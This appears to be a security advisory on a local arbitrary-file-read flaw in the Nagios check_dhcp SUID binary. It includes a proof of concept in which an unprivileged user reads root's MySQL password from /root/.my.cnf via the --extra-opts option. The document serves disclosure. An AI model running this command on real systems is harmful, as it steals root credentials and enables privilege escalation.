
  • Nagios Plugins check_dhcp Arbitrary File Read

    The Nagios plugin check_dhcp requires the root SUID bit on its binary in order to run
    correctly. A default installation of check_dhcp sets the SUID permission automatically.

    # ./configure ; make ; make install

    # ls -l /usr/local/nagios/libexec/check_dhcp
    -r-sr-xr-x 1 root root 171188 May 12 23:26 /usr/local/nagios/libexec/check_dhcp


    As the built-in help shows, the plugin can read options from a
    supplied config file via the --extra-opts option:

    # /usr/local/nagios/libexec/check_dhcp --help
    check_dhcp v2.0.1 (nagios-plugins 2.0.1)
    ...
    Usage:
    check_dhcp [-v] [-u] [-s serverip] [-r requestedip] [-t timeout]
    [-i interface] [-m mac]

    Options:
    ...
    --extra-opts=[section][@file]
    Read options from an ini file. See
    https://www.nagios-plugins.org/doc/extra-opts.html
    for usage and examples.


    The option can be used to read parts of any INI-format config file
    available on the system. Because check_dhcp runs as root (thanks to the
    SETUID bit), does not drop root privileges when accessing the config
    file, and does not check whether the given file should be accessible to
    the user executing it, any root-owned INI config file can be read this
    way by an unprivileged user on the local system.

    PROOF OF CONCEPT


    A good example of a program that stores configuration in INI format is MySQL.
    Administrators often save MySQL credentials in /root/.my.cnf to avoid having
    to type them each time they run a mysql client. The MySQL docs also suggest
    storing MySQL passwords in a config file for safety:
    http://dev.mysql.com/doc/refman/5.7/...rity-user.html

    An example MySQL config file could look like this:

    root@server [~]# cat /root/.my.cnf
    [client]
    password="nzk?V5l-"
    user=root

    If an unprivileged user has access to a system containing the SUID
    check_dhcp binary, he can easily use it to retrieve the password contained
    in the /root/.my.cnf file:

    prajith@server[~]$ id
    uid=1000(prajith) gid=1000(prajith) groups=1000(prajith)

    prajith@server[~]$ /usr/local/nagios/libexec/check_dhcp -v --extra-opts=client@/root/.my.cnf
    /usr/local/nagios/libexec/check_dhcp: unrecognized option '--password=nzk?V5l-'
    Usage:
    check_dhcp [-v] [-u] [-s serverip] [-r requestedip] [-t timeout]
    [-i interface] [-m mac]


    As we can see, the contents of the 'client' section of the /root/.my.cnf
    option file get printed as part of the error message.


    CREDITS

    The vulnerability has been discovered by legalhackers